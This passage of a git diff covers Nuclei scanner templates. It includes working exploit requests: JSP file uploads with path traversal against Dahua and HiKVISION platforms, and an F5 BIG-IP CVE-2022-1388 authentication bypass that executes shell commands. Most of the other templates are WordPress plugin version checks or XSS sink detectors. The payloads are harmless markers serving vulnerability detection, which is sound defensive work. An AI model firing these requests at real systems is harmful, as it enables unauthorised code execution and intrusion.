- product: smart_parking_management
- shodan-query: html:"/WPMS/asset"
- zoomeye-query: /WPMS/asset
- tags: cve,cve2023,dahua,fileupload,intrusive,rce
-variables:
- random_str: "{{rand_base(6)}}"
- match_str: "{{md5(random_str)}}"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
- Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 177
+ Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
- Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
- Content-Type: application/octet-stream
- Content-Transfer-Encoding: binary
+ --e00b34d08d13639f8b619829b04c1a29
+ Content-Disposition: form-data; name="upload"; filename="test.jsp"
+ Content-Type: image/gif
+
+ {{randstr}}
+ --e00b34d08d13639f8b619829b04c1a29--
- {{match_str}}
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- |
- GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
+ GET /upload/emap/society_new/{{name}} HTTP/1.1
Host: {{Hostname}}
- matchers:
- - type: dsl
- dsl:
- - "status_code_1 == 200 && status_code_2 == 200"
- - "contains(body_2, '{{match_str}}')"
- condition: and
-
extractors:
- - type: regex
- name: shell_filename
+ - type: json
+ name: name
+ json:
+ - ".data"
internal: true
- part: body_1
- regex:
- - 'ico_res_(\w+)_on\.jsp'
-# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ matchers:
+ - type: word
+ words:
+ - '{{randstr}}'
\ No newline at end of file
diff --git a/poc/microsoft/white-label-cms-666f157d61e42bbd8a6cd2cf31809b57.yaml b/poc/microsoft/white-label-cms-666f157d61e42bbd8a6cd2cf31809b57.yaml
new file mode 100644
index 0000000000..4ae016b306
--- /dev/null
+++ b/poc/microsoft/white-label-cms-666f157d61e42bbd8a6cd2cf31809b57.yaml
@@ -0,0 +1,59 @@
+id: white-label-cms-666f157d61e42bbd8a6cd2cf31809b57
+
+info:
+ name: >
+ White Label CMS <= 2.7.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8069e16d-a68a-4c72-934f-f79e50777565?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/white-label-cms/"
+ google-query: inurl:"/wp-content/plugins/white-label-cms/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,white-label-cms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/white-label-cms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "white-label-cms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.4')
\ No newline at end of file
diff --git a/poc/other/Hikvision_Env_Information_Leakage.yaml b/poc/other/Hikvision_Env_Information_Leakage.yaml
index cd961f6e81..e86e8491d1 100644
--- a/poc/other/Hikvision_Env_Information_Leakage.yaml
+++ b/poc/other/Hikvision_Env_Information_Leakage.yaml
@@ -1,27 +1,40 @@
id: HiKVISION
info:
- name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability
- author: zerZero Trust Security Attack and Defense Laboratoryo
- severity: medium
+ name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability
+ author: Zero Trust Security Attack and Defense Laboratory
+ severity: high
description: |
- There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks
+ There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets
metadata:
- fofa-query: app="HIKVISION-综合安防管理平台"
+ fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台"
hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
http:
- - method: GET
- path:
- - "{{BaseURL}}/artemis-portal/artemis/env"
+ - raw:
+ - |
+ POST /svm/api/external/report HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "profiles"
+ ------WebKitFormBoundary9PggsiM755PLa54a
+ Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp"
+ Content-Type: application/zip
+
+ <%out.print("test");%>
- - type: status
- status:
- - 200
+ ------WebKitFormBoundary9PggsiM755PLa54a--
+ - |
+ GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_1 == 200'
+ - 'contains(body_1, "data")'
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "test")'
+ condition: and
diff --git a/poc/other/bigip.yaml b/poc/other/bigip.yaml
index 62a06938bc..824800fadb 100644
--- a/poc/other/bigip.yaml
+++ b/poc/other/bigip.yaml
@@ -1,29 +1,30 @@
id: CVE-2022-1388
+
info:
- name: F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter
- author: Mrcl0wn
+ name: F5 BIG-IP iControl - REST Auth Bypass RCE
+ author: dwisiswant0,Ph33r
severity: critical
- description: "CVE-2022-1388 is an authentication bypass vulnerability in the REST \ncomponent of BIG-IP’s iControl API that was assigned a CVSSv3 \nscore of 9.8. The iControl REST API is used for the management and \nconfiguration of BIG-IP devices. CVE-2022-1388 could be exploited \nby an unauthenticated attacker with network access to the management \nport or self IP addresses of devices that use BIG-IP. Exploitation would \nallow the attacker to execute arbitrary system commands, create and \ndelete files and disable services.\n"
+ description: |
+ F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication.
reference:
- - https://github.com/alt3kx/CVE-2022-1388_PoC
+ - https://twitter.com/GossiTheDog/status/1523566937414193153
+ - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
- https://support.f5.com/csp/article/K23605346
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
- - https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
- - https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
- - https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip
- - https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2022-1388
cwe-id: CWE-306
metadata:
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
- verified: true
- tags: bigip,mirai,rce,cve,cve2022
+ verified: "true"
+ tags: f5,bigip,cve,cve2022,rce,mirai,kev
+
variables:
- auth_var: "admin:"
- cmd_var: "{{CMD}}"
+ auth: "admin:"
+ cmd: "echo CVE-2022-1388 | rev"
+
requests:
- raw:
- |
@@ -31,27 +32,35 @@ requests:
Host: {{Hostname}}
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: a
- Authorization: Basic {{base64(auth_var)}}
+ Authorization: Basic {{base64(auth)}}
Content-Type: application/json
{
- "command": "run",
- "utilCmdArgs": "-c 'id;cmd_var'"
+ "command": "run",
+ "utilCmdArgs": "-c '{{cmd}}'"
}
- extractors:
- - type: regex
- part: body
- name: result_command
- group: 1
- regex:
- - "\"commandResult\":\"(.*)\""
+
+ - |
+ POST /mgmt/tm/util/bash HTTP/1.1
+ Host: localhost
+ Connection: keep-alive, X-F5-Auth-Token
+ X-F5-Auth-Token: a
+ Authorization: Basic {{base64(auth)}}
+ Content-Type: application/json
+
+ {
+ "command": "run",
+ "utilCmdArgs": "-c '{{cmd}}'"
+ }
+
+ stop-at-first-match: true
+ matchers-condition: and
matchers:
- type: word
+ part: body
words:
- "commandResult"
- - "uid="
- - "{{cmd_var}}"
- - type: status
- status:
- - 200
+ - "8831-2202-EVC"
condition: and
+
+# Enhanced by mp on 2022/05/19
diff --git a/poc/other/bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed.yaml b/poc/other/bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed.yaml
new file mode 100644
index 0000000000..8cd2b5e8cb
--- /dev/null
+++ b/poc/other/bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed.yaml
@@ -0,0 +1,59 @@
+id: bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed
+
+info:
+ name: >
+ Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6d3b9d15-f6a9-4d1c-ada5-8c48add839a2?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/bitformpro/"
+ google-query: inurl:"/wp-content/plugins/bitformpro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,bitformpro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bitformpro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.4')
\ No newline at end of file
diff --git a/poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml b/poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml
new file mode 100644
index 0000000000..b217c832cf
--- /dev/null
+++ b/poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml
@@ -0,0 +1,59 @@
+id: bitformpro-c1951a840a2ea27fbc40d83eac2e0432
+
+info:
+ name: >
+ Bit Form Pro <= 2.6.4 - Unauthenticated Arbitrary File Deletion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7a09288c-b8de-4674-9f96-d26ff3c7d917?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/bitformpro/"
+ google-query: inurl:"/wp-content/plugins/bitformpro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,bitformpro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bitformpro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.4')
\ No newline at end of file
diff --git a/poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml b/poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml
new file mode 100644
index 0000000000..7cd4c5fefa
--- /dev/null
+++ b/poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml
@@ -0,0 +1,59 @@
+id: bitformpro-d139e243b64b91b847d04cde6b5cce90
+
+info:
+ name: >
+ Bit Form Pro <= 2.6.4 - Missing Authorization to Authenticated (Subscriber+) Settings Update
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/525a2180-3643-4f78-aafd-99a546bac363?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/bitformpro/"
+ google-query: inurl:"/wp-content/plugins/bitformpro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,bitformpro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bitformpro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.4')
\ No newline at end of file
diff --git a/poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml b/poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml
new file mode 100644
index 0000000000..683c343e1d
--- /dev/null
+++ b/poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml
@@ -0,0 +1,59 @@
+id: bitformpro-d755f86f5f98181fb2d499fd64b215af
+
+info:
+ name: >
+ Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/efa646ee-ebee-4528-a421-09ee3dc8275a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/bitformpro/"
+ google-query: inurl:"/wp-content/plugins/bitformpro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,bitformpro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bitformpro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.4')
\ No newline at end of file
diff --git a/poc/other/busiprof-ad5d3d293e421d6fd904811f4fd425fa.yaml b/poc/other/busiprof-ad5d3d293e421d6fd904811f4fd425fa.yaml
new file mode 100644
index 0000000000..79d6741989
--- /dev/null
+++ b/poc/other/busiprof-ad5d3d293e421d6fd904811f4fd425fa.yaml
@@ -0,0 +1,59 @@
+id: busiprof-ad5d3d293e421d6fd904811f4fd425fa
+
+info:
+ name: >
+ Busiprof <= 2.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0acf3219-1443-42cc-b3c9-cffb8fd8af07?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/busiprof/"
+ google-query: inurl:"/wp-content/themes/busiprof/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,busiprof,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/busiprof/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "busiprof"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.8')
\ No newline at end of file
diff --git a/poc/other/clearfy-2ca2a060d0fe3d1049a304a11c885f52.yaml b/poc/other/clearfy-2ca2a060d0fe3d1049a304a11c885f52.yaml
new file mode 100644
index 0000000000..500940164f
--- /dev/null
+++ b/poc/other/clearfy-2ca2a060d0fe3d1049a304a11c885f52.yaml
@@ -0,0 +1,59 @@
+id: clearfy-2ca2a060d0fe3d1049a304a11c885f52
+
+info:
+ name: >
+ Clearfy Cache <= 2.2.3 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc29341-a23e-4694-b852-90794c01473a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/clearfy/"
+ google-query: inurl:"/wp-content/plugins/clearfy/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,clearfy,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clearfy/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clearfy"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.3')
\ No newline at end of file
diff --git a/poc/other/clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a.yaml b/poc/other/clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a.yaml
new file mode 100644
index 0000000000..f05a439150
--- /dev/null
+++ b/poc/other/clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a.yaml
@@ -0,0 +1,59 @@
+id: clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a
+
+info:
+ name: >
+ Smart Online Order for Clover <= 1.5.6 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/34d990b6-3021-45d4-9ecd-cfabb7fbc96c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/clover-online-orders/"
+ google-query: inurl:"/wp-content/plugins/clover-online-orders/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,clover-online-orders,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clover-online-orders"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.6')
\ No newline at end of file
diff --git a/poc/other/clover-online-orders-d77a8bf96347576e414fb350aeaf95b7.yaml b/poc/other/clover-online-orders-d77a8bf96347576e414fb350aeaf95b7.yaml
new file mode 100644
index 0000000000..b2354500ed
--- /dev/null
+++ b/poc/other/clover-online-orders-d77a8bf96347576e414fb350aeaf95b7.yaml
@@ -0,0 +1,59 @@
+id: clover-online-orders-d77a8bf96347576e414fb350aeaf95b7
+
+info:
+ name: >
+ Smart Online Order for Clover <= 1.5.6 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/195788de-129e-4112-bcab-a7835c8164ca?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/clover-online-orders/"
+ google-query: inurl:"/wp-content/plugins/clover-online-orders/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,clover-online-orders,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clover-online-orders"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.6')
\ No newline at end of file
diff --git a/poc/other/contest-gallery-36b5f89448d064c7305ddcbc679586d1.yaml b/poc/other/contest-gallery-36b5f89448d064c7305ddcbc679586d1.yaml
new file mode 100644
index 0000000000..ed9cb01472
--- /dev/null
+++ b/poc/other/contest-gallery-36b5f89448d064c7305ddcbc679586d1.yaml
@@ -0,0 +1,59 @@
+id: contest-gallery-36b5f89448d064c7305ddcbc679586d1
+
+info:
+ name: >
+ Contest Gallery <= 23.1.2 - Unauthenticated Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5e400f8-35b4-4be4-bb00-c59e14ddd57f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/contest-gallery/"
+ google-query: inurl:"/wp-content/plugins/contest-gallery/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,contest-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/contest-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "contest-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 23.1.2')
\ No newline at end of file
diff --git a/poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml b/poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml
new file mode 100644
index 0000000000..f82e1b2ef6
--- /dev/null
+++ b/poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml
@@ -0,0 +1,59 @@
+id: display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468
+
+info:
+ name: >
+ Meta Field Block <= 1.2.13 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/faee30bb-ba6e-4d3e-8ca1-79fd676e68f5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/display-a-meta-field-as-block/"
+ google-query: inurl:"/wp-content/plugins/display-a-meta-field-as-block/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,display-a-meta-field-as-block,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/display-a-meta-field-as-block/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "display-a-meta-field-as-block"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.13')
\ No newline at end of file
diff --git a/poc/other/dom-invaider.yaml b/poc/other/dom-invaider.yaml
index 726c653298..b720bd8f88 100644
--- a/poc/other/dom-invaider.yaml
+++ b/poc/other/dom-invaider.yaml
@@ -1,17 +1,23 @@
id: dom-xss
info:
- name: DOM XSS Sources & Sinks
- reference: https://portswigger.net/blog/introducing-dom-invader
+ name: DOM Invader - Cross-Site Scripting
author: geeknik
- severity: info
- tags: dom,xss
-
+ severity: high
+ description: DOM Invader contains a cross-site scripting vulnerability in Sources & Sinks functionality.
+ reference:
+ - Inspired by https://portswigger.net/blog/introducing-dom-invader
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
+ tags: xss,file
file:
- extensions:
- js
- ts
- html
+ - htm
- php
- cs
- rb
@@ -22,7 +28,7 @@ file:
name: sink
part: body
regex:
- - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)'
+ - 'jQuery(\.globalEval|\.\$|\.constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)'
- 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse'
- 'fetch(\.body)?'
- 'history(\.pushState|\.replaceState)'
@@ -36,6 +42,7 @@ file:
- 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?'
- 'iframe(\.srcdoc|\.src)'
- 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)'
+
- type: regex
name: source
part: body
@@ -43,3 +50,5 @@ file:
- 'location(\.href|\.hash|\.search|\.pathname)?'
- 'window\.name'
- 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)'
+
+# digest: 4a0a004730450220156c7817e33c48d906821587c273a5b1ecd3ed8996c0616e7468f27a46d04aec022100893e4c2dce9b2668a6643dd2fbe05f4a536c3b2df1e7223d971503333da4fb7f:922c64590222798bb761d5b6d8e72950
